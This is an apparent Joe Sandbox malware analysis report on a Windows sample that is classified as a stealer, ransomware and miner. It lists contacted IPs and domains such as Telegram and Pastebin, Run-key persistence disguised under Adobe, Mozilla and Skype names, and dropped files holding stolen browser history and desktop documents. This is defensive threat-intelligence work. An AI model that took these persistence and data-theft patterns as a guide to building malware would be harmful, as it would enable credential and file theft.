https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id15ResponseD	62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id10Response	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id8Response	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false
http://www.founder.com.cn/cn/bThe	accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.209.71	ipbase.com	United States	13335	CLOUDFLARENETUS	false
104.16.184.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
64.31.40.18	hrdc.pk	United States	46475	LIMESTONENETWORKSUS	true
75.119.203.100	www.westnilebirdingandsafari.com	United States	26347	DREAMHOST-ASUS	true
162.125.66.15	edge-block-www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
192.3.140.185	igenius.org	United States	36352	AS-COLOCROSSINGUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
188.114.97.3	auth.xn--conbase-sfb.xyz	European Union	13335	CLOUDFLARENETUS	true
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	freegeoip.app	European Union	13335	CLOUDFLARENETUS	true
94.232.249.204	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	true
172.67.196.114	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1468518
Start date and time:	2024-07-06 13:26:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	55
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	xj40xovMsm.exe renamed because original name is a hash value
Original Sample Name:	1082572a44d4c41214a3c38dcd8289f9.exe
Detection:	MAL
Classification:	mal100.rans.phis.troj.adwa.spyw.evad.mine.winEXE@97/413@19/15
EGA Information:	Successful, ratio: 61.1%
HCA Information:	Successful, ratio: 96% Number of executed functions: 344 Number of non-executed functions: 131
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 3CBD.tmp.Installer.exe, PID 6828 because it is empty
Execution Graph export aborted for target 53A5.tmp.update.exe, PID 7508 because it is empty
Execution Graph export aborted for target 62AB.tmp.build.exe, PID 7672 because it is empty
Execution Graph export aborted for target accc.exe, PID 6896 because it is empty
Execution Graph export aborted for target accc.exe, PID 7324 because it is empty
Execution Graph export aborted for target svchost.exe, PID 7952 because it is empty
Execution Graph export aborted for target svchost.exe, PID 796 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:27:11	API Interceptor	2x Sleep call for process: svchost.exe modified
07:27:19	API Interceptor	1x Sleep call for process: 3CBD.tmp.Installer.exe modified
07:27:20	API Interceptor	219x Sleep call for process: 4BC4.tmp.Client.exe modified
07:27:24	API Interceptor	2399x Sleep call for process: explorer.exe modified
07:27:49	API Interceptor	23x Sleep call for process: 62AB.tmp.build.exe modified
07:28:18	API Interceptor	17x Sleep call for process: powershell.exe modified
07:28:27	API Interceptor	178x Sleep call for process: jqnnpe.exe modified
07:28:37	API Interceptor	231x Sleep call for process: 4336.tmp.Server.exe modified
07:28:41	API Interceptor	31x Sleep call for process: 476D.tmp.Server.exe modified
12:27:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service_Adobe C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe
12:27:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service_com.adobe.dunamis C:\Users\user\AppData\Roaming\com.adobe.dunamis\Service_com.adobe.dunamis.exe
12:27:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service_Microsoft C:\Users\user\AppData\Roaming\Microsoft\Service_Microsoft.exe
12:27:31	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service_Mozilla C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exe
12:27:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service_Skype C:\Users\user\AppData\Roaming\Skype\Service_Skype.exe
12:27:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive C:\Users\user\Desktop\xj40xovMsm.exe
12:28:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ACCC Tools C:\ProgramData\KMSAuto\accc.exe
12:28:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
12:28:31	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service_{B955B2CC07A01546086603} C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe
12:28:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WpnUserService C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe
12:28:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Service_Adobe C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe
12:29:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Service_com.adobe.dunamis C:\Users\user\AppData\Roaming\com.adobe.dunamis\Service_com.adobe.dunamis.exe
12:29:14	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Service_Microsoft C:\Users\user\AppData\Roaming\Microsoft\Service_Microsoft.exe
12:29:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Service_Mozilla C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exe
12:29:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Service_Skype C:\Users\user\AppData\Roaming\Skype\Service_Skype.exe

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	674037
Entropy (8bit):	7.976210626557236
Encrypted:	false
SSDEEP:	12288:4glrlZJV3vOCW7z+YD+04mcjdcVpKVSGs8vSOb3hnl6+M3M93nkH:4srj//EKg+0LWDjlfM3T
MD5:	F64F2F00319D13F54A218A3F984C7D74
SHA1:	AF6012CEF7558138451921D1242A6D826EA6ACCC
SHA-256:	051868FF403B7F3EAC672C61D7154619E0E4A079FA195C25184F0E97479F6186
SHA-512:	9EFB4BFAA6591BB27196013E93646374106F1E073B286BEA2525CB2BF1AC939B8B093DF6A4D028099BD2E3D4CEB4BE731A483F80B76469F281651D6D5BFF6F2C
Malicious:	false
Reputation:	unknown
Preview:	PK..-......;.X.(............8.Information.txt............N......... ...........W.......W.......W.....R..q#.S...C.4.n..F.O......E...F..NC..m.^..\(..v\a\|nS.eq..:.ymT.v#...s0>;i.[..'...A....d' ...t...!...V..H&.5....O....z-os.;..../.].yfdl......[.N.I......F.g.Q.vd s.J..'^.....K"..v..8.Y..h...c)......g.(r]}\.B.....>..E.u.vhsjQ{C..OMJ.7......).!.-......V!...8..7(.O..h..0e..5......)..R..X;>".g_(.).aLo\\.u....s..h..e.A./..PK..-.....i;.X`.S<..........8.InstalledSoftware.txt...................... ..........%.v.....%.v.....%.v.........d...zY.f..F........."...fL.g.."..l.v.2..........GP..d..C.....\@.Od6.Y.B..0...9......Tw.....<..O.]...^.6GQ...\.w....j...!1.1...1+O.g+..Os.s~{.j.I.T.rW.e.V...Q..6.V..PK..-......;.X.?............8.Process.txt.....9................ .........1.......1..........y.........d...^..fq...>...,"..X{........`...J..mfi.].....XH._...".L.._..",E...2#.h.jgQ*.PW..FRg.j.05...&..O..e.?xq..'}...N..Ll..M.(W.N...Y..g..S"k.....n.....[..'.....D4.0G.r..

C:\ProgramData\134349\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Reputation:	unknown
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\ProgramData\134349\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Reputation:	unknown
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\ProgramData\134349\Browsers\Google\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1393
Entropy (8bit):	5.241470443395582
Encrypted:	false
SSDEEP:	24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
MD5:	7F24357FFA354F2471DED45552B897D7
SHA1:	1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
SHA-256:	573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
SHA-512:	202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
Malicious:	false
Reputation:	unknown
Preview:	### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

C:\ProgramData\134349\Browsers\Outlook\Outlook.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Reputation:	unknown
Preview:	..

C:\ProgramData\134349\DotNetZip-a5lqjpzy.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	674037
Entropy (8bit):	7.976210626557236
Encrypted:	false
SSDEEP:	12288:4glrlZJV3vOCW7z+YD+04mcjdcVpKVSGs8vSOb3hnl6+M3M93nkH:4srj//EKg+0LWDjlfM3T
MD5:	F64F2F00319D13F54A218A3F984C7D74
SHA1:	AF6012CEF7558138451921D1242A6D826EA6ACCC
SHA-256:	051868FF403B7F3EAC672C61D7154619E0E4A079FA195C25184F0E97479F6186
SHA-512:	9EFB4BFAA6591BB27196013E93646374106F1E073B286BEA2525CB2BF1AC939B8B093DF6A4D028099BD2E3D4CEB4BE731A483F80B76469F281651D6D5BFF6F2C
Malicious:	false
Reputation:	unknown
Preview:	PK..-......;.X.(............8.Information.txt............N......... ...........W.......W.......W.....R..q#.S...C.4.n..F.O......E...F..NC..m.^..\(..v\a\|nS.eq..:.ymT.v#...s0>;i.[..'...A....d' ...t...!...V..H&.5....O....z-os.;..../.].yfdl......[.N.I......F.g.Q.vd s.J..'^.....K"..v..8.Y..h...c)......g.(r]}\.B.....>..E.u.vhsjQ{C..OMJ.7......).!.-......V!...8..7(.O..h..0e..5......)..R..X;>".g_(.).aLo\\.u....s..h..e.A./..PK..-.....i;.X`.S<..........8.InstalledSoftware.txt...................... ..........%.v.....%.v.....%.v.........d...zY.f..F........."...fL.g.."..l.v.2..........GP..d..C.....\@.Od6.Y.B..0...9......Tw.....<..O.]...^.6GQ...\.w....j...!1.1...1+O.g+..Os.s~{.j.I.T.rW.e.V...Q..6.V..PK..-......;.X.?............8.Process.txt.....9................ .........1.......1..........y.........d...^..fq...>...,"..X{........`...J..mfi.].....XH._...".L.._..",E...2#.h.jgQ*.PW..FRg.j.05...&..O..e.?xq..'}...N..Ll..M.(W.N...Y..g..S"k.....n.....[..'.....D4.0G.r..

C:\ProgramData\134349\FileGrabber\Desktop\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Desktop\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Desktop\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\134349\FileGrabber\Desktop\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\ProgramData\134349\FileGrabber\Desktop\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
